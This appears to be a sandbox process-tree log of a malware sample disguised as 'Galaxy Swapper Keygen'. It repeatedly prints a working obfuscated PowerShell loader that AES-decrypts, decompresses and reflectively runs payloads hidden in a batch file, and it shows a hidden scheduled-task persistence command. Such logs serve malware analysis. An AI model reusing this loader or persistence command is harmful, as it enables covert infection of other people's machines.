C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
80⤵
PID:9728

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
80⤵
- Command and Scripting Interpreter: PowerShell
PID:5184

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
79⤵
PID:4328

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
80⤵
PID:4124

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
81⤵
PID:5452

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
81⤵
PID:5528

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
80⤵
PID:5908

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
81⤵
PID:2836

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
81⤵
PID:2880

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
82⤵
PID:1572

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
83⤵
PID:4100

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
83⤵
- Command and Scripting Interpreter: PowerShell
PID:6876

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
82⤵
PID:5768

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
83⤵
PID:5908

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
83⤵
PID:3012

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
84⤵
PID:6216

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
84⤵
PID:6228

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
85⤵
PID:6348

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
86⤵
PID:11004

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
86⤵
- Command and Scripting Interpreter: PowerShell
PID:11032

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
85⤵
PID:6372

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
86⤵
PID:6524

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
86⤵
PID:6548

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
87⤵
PID:6760

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
88⤵
PID:7756

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
88⤵
- Command and Scripting Interpreter: PowerShell
PID:8484

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
87⤵
PID:6784

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
88⤵
PID:6860

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
88⤵
PID:6888

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
89⤵
PID:6948

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
89⤵
PID:6956

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
90⤵
PID:7080

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
91⤵
PID:7352

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
91⤵
- Command and Scripting Interpreter: PowerShell
PID:6148

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
90⤵
PID:7140

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
91⤵
PID:5672

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
91⤵
PID:6076

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
92⤵
PID:6368

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
92⤵
PID:6284

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
93⤵
PID:1920

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
94⤵
PID:5976

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
94⤵
- Command and Scripting Interpreter: PowerShell
PID:1736

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
93⤵
PID:6560

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
94⤵
PID:6552

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
94⤵
PID:6572

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
95⤵
PID:6624

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
95⤵
PID:6540

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
96⤵
PID:6892

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
96⤵
PID:5304

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
97⤵
PID:1964

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
97⤵
PID:3432

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
98⤵
PID:1380

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
99⤵
PID:1464

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
99⤵
PID:4604

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_46_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_46.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
100⤵
- Command and Scripting Interpreter: PowerShell
PID:10808

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
98⤵
PID:5412

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
99⤵
PID:6484

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
99⤵
PID:6376

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
100⤵
PID:6268

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
100⤵
PID:6948

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
101⤵
PID:5356

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
102⤵
PID:10312

